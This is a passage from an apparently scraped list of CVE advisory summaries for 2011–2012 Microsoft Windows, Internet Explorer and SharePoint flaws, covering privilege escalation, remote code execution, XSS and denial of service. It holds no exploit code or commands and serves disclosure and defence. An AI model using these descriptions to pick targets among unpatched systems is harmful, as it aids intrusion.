64-bit platforms does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "AfdPoll Elevation of Privilege Vulnerability." [CVE-2012-0013] Incomplete blacklist vulnerability in the Windows Packager configuration in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted ClickOnce application in a Microsoft Office document, related to .application files, aka "Assembly Execution Vulnerability." [CVE-2012-0009] Untrusted search path vulnerability in the Windows Object Packager configuration in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a Trojan horse executable file in the current working directory, as demonstrated by a directory that contains a file with an embedded packaged object, aka "Object Packager Insecure Executable Launching Vulnerability." [CVE-2012-0006] The DNS server in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 does not properly handle objects in memory during record lookup, which allows remote attackers to cause a denial of service (daemon restart) via a crafted query, aka "DNS Denial of Service Vulnerability." [CVE-2012-0005] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2, when a Chinese, Japanese, or Korean system locale is used, can access uninitialized memory during the processing of Unicode characters, which allows local users to gain privileges via a crafted application, aka "CSRSS Elevation of Privilege Vulnerability." [CVE-2012-0004] Unspecified vulnerability in DirectShow in DirectX in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted media file, related to Quartz.dll, Qdvd.dll, closed captioning, and the Line21 DirectShow filter, aka "DirectShow Remote Code Execution Vulnerability." [CVE-2012-0003] Unspecified vulnerability in winmm.dll in Windows Multimedia Library in Windows Media Player (WMP) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via a crafted MIDI file, aka "MIDI Remote Code Execution Vulnerability." [CVE-2012-0002] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability." [CVE-2012-0001] The kernel in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly load structured exception handling tables, which allows context-dependent attackers to bypass the SafeSEH security feature by leveraging a Visual C++ .NET 2003 application, aka "Windows Kernel SafeSEH Bypass Vulnerability." [CVE-2011-5046] The Graphics Device Interface (GDI) in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted data, as demonstrated by a large height attribute of an IFRAME element rendered by Safari, aka "GDI Access Violation Vulnerability." [CVE-2011-4695] Unspecified vulnerability in Microsoft Windows 7 SP1, when Java is installed, allows local users to bypass Internet Explorer sandbox restrictions and gain privileges via unknown vectors, as demonstrated by the White Phosphorus wp_ie_sandbox_escape module for Immunity CANVAS. NOTE: as of 20111207, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2011-4434] Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 do not properly enforce AppLocker rules, which allows local users to bypass intended access restrictions via a (1) macro or (2) scripting feature in an application, as demonstrated by Microsoft Office applications and the SANDBOX_INERT and LOAD_IGNORE_CODE_AUTHZ_LEVEL flags. [CVE-2011-3408] Csrsrv.dll in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly check permissions for sending inter-process device-event messages from low-integrity processes to high-integrity processes, which allows local users to gain privileges via a crafted application, aka "CSRSS Local Privilege Elevation Vulnerability." [CVE-2011-3406] Buffer overflow in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote authenticated users to execute arbitrary code via a crafted query that leverages incorrect memory initialization, aka "Active Directory Buffer Overflow Vulnerability." [CVE-2011-3402] Unspecified vulnerability in the TrueType font parsing engine in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted font data in a Word document or web page, as exploited in the wild in November 2011 by Duqu, aka "TrueType Font Parsing Vulnerability." [CVE-2011-3401] ENCDEC.DLL in Windows Media Player and Media Center in Microsoft Windows XP SP2 and SP3, Windows Vista SP2, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .dvr-ms file, aka "Windows Media Player DVR-MS Memory Corruption Vulnerability." [CVE-2011-3400] Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 do not properly handle OLE objects in memory, which allows remote attackers to execute arbitrary code via a crafted object in a file, aka "OLE Property Vulnerability." [CVE-2011-3397] The Microsoft Time component in DATIME.DLL in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted web site that leverages an unspecified "binary behavior" in Internet Explorer, aka "Microsoft Time Remote Code Execution Vulnerability." [CVE-2011-3389] The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. [CVE-2011-2019] Untrusted search path vulnerability in Microsoft Internet Explorer 9 on Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an HTML file, aka "Internet Explorer Insecure Library Loading Vulnerability." [CVE-2011-2018] The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, and Windows 7 Gold and SP1 does not properly initialize objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2011-2016] Untrusted search path vulnerability in Windows Mail and Windows Meeting Space in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .eml or .wcinv file, aka "Windows Mail Insecure Library Loading Vulnerability." [CVE-2011-2014] The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not examine Certificate Revocation Lists (CRLs), which allows remote authenticated users to bypass intended certificate restrictions and access Active Directory resources by leveraging a revoked X.509 certificate for a domain account, aka "LDAPS Authentication Bypass Vulnerability." [CVE-2011-2013] Integer overflow in the TCP/IP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code by sending a sequence of crafted UDP packets to a closed port, aka "Reference Counter Overflow Vulnerability." [CVE-2011-2011] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability." [CVE-2011-2009] Untrusted search path vulnerability in Windows Media Center in Microsoft Windows Vista SP2 and Windows 7 Gold and SP1, and Windows Media Center TV Pack for Windows Vista, allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Media Center Insecure Library Loading Vulnerability." [CVE-2011-2005] afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2011-2004] Array index error in win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a crafted TrueType font file, aka "TrueType Font Parsing Vulnerability," a different vulnerability than CVE-2011-3402. [CVE-2011-2003] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .fon file, aka "Font Library File Buffer Overrun Vulnerability." [CVE-2011-2002] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle TrueType fonts, which allows local users to cause a denial of service (system hang) via a crafted font file, aka "Win32k TrueType Font Type Translation Vulnerability." [CVE-2011-1991] Multiple untrusted search path vulnerabilities in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .rtf, or .txt file, related to (1) deskpan.dll in the Display Panning CPL Extension, (2) EAPHost Authenticator Service, (3) Folder Redirection, (4) HyperTerminal, (5) the Japanese Input Method Editor (IME), and (6) Microsoft Management Console (MMC), aka "Windows Components Insecure Library Loading Vulnerability." [CVE-2011-1985] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1984] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges by sending crafted packets over the loopback interface, aka "WINS Local Elevation of Privilege Vulnerability." [CVE-2011-1975] Untrusted search path vulnerability in the Data Access Tracing component in Windows Data Access Components (Windows DAC) 6.0 in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an Excel .xlsx file, aka "Data Access Components Insecure Library Loading Vulnerability." [CVE-2011-1974] NDISTAPI.sys in the NDISTAPI driver in Remote Access Service (RAS) in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "NDISTAPI Elevation of Privilege Vulnerability." [CVE-2011-1971] The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly parse file metadata, which allows local users to cause a denial of service (reboot) via a crafted file, aka "Windows Kernel Metadata Parsing DOS Vulnerability." [CVE-2011-1970] The DNS server in Microsoft Windows Server 2003 SP2 and Windows Server 2008 SP2, R2, and R2 SP1 does not properly initialize memory, which allows remote attackers to cause a denial of service (service outage) via a query for a nonexistent domain, aka "DNS Uninitialized Memory Corruption Vulnerability." [CVE-2011-1968] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly process packets in memory, which allows remote attackers to cause a denial of service (reboot) by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, as exploited in the wild in 2011, aka "Remote Desktop Protocol Vulnerability." [CVE-2011-1967] Winsrv.dll in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly check permissions for sending inter-process device-event messages from low-integrity processes to high-integrity processes, which allows local users to gain privileges via a crafted application, aka "CSRSS Vulnerability." [CVE-2011-1966] The DNS server in Microsoft Windows Server 2008 SP2, R2, and R2 SP1 does not properly handle NAPTR queries that trigger recursive processing, which allows remote attackers to execute arbitrary code via a crafted query, aka "DNS NAPTR Query Vulnerability." [CVE-2011-1965] Tcpip.sys in the TCP/IP stack in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 does not properly implement URL-based QoS, which allows remote attackers to cause a denial of service (reboot) via a crafted URL to a web server, aka "TCP/IP QOS Denial of Service Vulnerability." [CVE-2011-1894] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for embedded content in an HTML document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted EMBED element in a web page that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-1893] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2010, Windows SharePoint Services 2.0 and 3.0 SP2, and SharePoint Foundation 2010 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "SharePoint XSS Vulnerability." [CVE-2011-1892] Microsoft Office Groove 2007 SP2, SharePoint Workspace 2010 Gold and SP1, Office Forms Server 2007 SP2, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Office Groove Data Bridge Server 2007 SP2, Office Groove Management Server 2007 SP2, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, and Office Web Apps 2010 Gold and SP1 do not properly handle Web Parts containing XML classes referencing external entities, which allows remote authenticated users to read arbitrary files via a crafted XML and XSL file, aka "SharePoint Remote File Disclosure Vulnerability." [CVE-2011-1891] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in a request to a script, aka "Contact Details Reflected XSS Vulnerability." [CVE-2011-1888] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1887] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1886] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 does not properly validate the arguments to functions, which allows local users to read arbitrary data from kernel memory via a crafted application that triggers a NULL pointer dereference, aka "Win32k Incorrect Parameter Validation Allows Information Disclosure Vulnerability." [CVE-2011-1885] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1884] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1883] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1882] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1881] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1880] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1879] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1878] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1877] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability." [CVE-2011-1876] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1875] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1874] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1873] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 on 64-bit platforms does not properly validate pointers during the parsing of OpenType (aka OTF) fonts, which allows remote attackers to execute arbitrary code via a crafted font file, aka "Win32k OTF Validation Vulnerability." [CVE-2011-1872] Hyper-V in Microsoft Windows Server 2008 Gold, SP2, R2, and R2 SP1 allows guest OS users to cause a denial of service (host OS infinite loop) via malformed machine instructions in a VMBus packet, aka "VMBus Persistent DoS Vulnerability." [CVE-2011-1871] Tcpip.sys in the TCP/IP stack in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a series of crafted ICMP messages, aka "ICMP Denial of Service Vulnerability." [CVE-2011-1870] Integer overflow in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvWriteConsoleOutputString Vulnerability." [CVE-2011-1869] The Distributed File System (DFS) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote DFS servers to cause a denial of service (system hang) via a crafted referral response, aka "DFS Referral Response Vulnerability." [CVE-2011-1868] The Distributed File System (DFS) implementation in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate fields in DFS responses, which allows remote DFS servers to execute arbitrary code via a crafted response, aka "DFS Memory Corruption Vulnerability." [CVE-2011-1713] Microsoft msxml.dll, as used in Internet Explorer 8 on Windows 7, allows remote attackers to obtain potentially sensitive information about heap memory addresses via an XML document containing a call to the XSLT generate-id XPath function. NOTE: this might overlap CVE-2011-1202. [CVE-2011-1652] DISPUTED The default configuration of Microsoft Windows 7 immediately prefers a new IPv6 and DHCPv6 service over a currently used IPv4 and DHCPv4 service upon receipt of an IPv6 Router Advertisement (RA), and does not provide an option to ignore an unexpected RA, which allows remote attackers to conduct man-in-the-middle attacks on communication with external IPv4 servers via vectors involving RAs, a DHCPv6 server, and NAT-PT on the local network, aka a "SLAAC Attack." NOTE: it can be argued that preferring IPv6 complies with RFC 3484, and that attempting to determine the legitimacy of an RA is currently outside the scope of recommended behavior of host operating systems. [CVE-2011-1347] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to bypass Protected Mode and create arbitrary files by leveraging access to a Low integrity process, as demonstrated by Stephen Fewer as the third of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1346] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, as demonstrated by Stephen Fewer as the second of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1284] Integer overflow in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvWriteConsoleOutput Vulnerability." [CVE-2011-1283] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 does not ensure that an unspecified array index has a non-negative value before performing read and write operations, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvSetConsoleNumberOfCommand Vulnerability." [CVE-2011-1282] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly initialize memory and consequently uses a NULL pointer in an unspecified function call, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvSetConsoleLocalEUDC Vulnerability." [CVE-2011-1281] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly restrict the number of console objects for a process, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP AllocConsole Vulnerability." [CVE-2011-1268] The SMB client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote SMB servers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Response Parsing Vulnerability." [CVE-2011-1267] The SMB server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 request, aka "SMB Request Parsing Vulnerability." [CVE-2011-1265] The Bluetooth Stack 2.1 in Microsoft Windows Vista SP1 and SP2 and Windows 7 Gold and SP1 does not prevent access to objects in memory that (1) were not properly initialized or (2) have been deleted, which allows remote attackers to execute arbitrary code via crafted Bluetooth packets, aka "Bluetooth Stack Vulnerability." [CVE-2011-1264] Cross-site scripting (XSS) vulnerability in Active Directory Certificate Services Web Enrollment in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Active Directory Certificate Services Vulnerability." [CVE-2011-1263] Cross-site scripting (XSS) vulnerability in the logon page in Remote Desktop Web Access (RD Web Access) in Microsoft Windows Server 2008 R2 and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "Remote Desktop Web Access Vulnerability." [CVE-2011-1252] Cross-site scripting (XSS) vulnerability in the SafeHTML function in the toStaticHTML API in Microsoft Internet Explorer 7 and 8, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified strings, aka "toStaticHTML Information Disclosure Vulnerability" or "HTML Sanitization Vulnerability." [CVE-2011-1249] The Ancillary Function Driver (AFD) in afd.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2011-1248] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 does not properly handle socket send exceptions, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted packets, related to unintended stack-frame values and buffer passing, aka "WINS Service Failed Response Vulnerability." [CVE-2011-1247] Untrusted search path vulnerability in the Microsoft Active Accessibility component in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Active Accessibility Insecure Library Loading Vulnerability." [CVE-2011-1243] The Windows Messenger ActiveX control in msgsc.dll in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via unspecified vectors that "corrupt the system state," aka "Microsoft Windows Messenger ActiveX Control Vulnerability." [CVE-2011-1242] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1241] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1240] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object 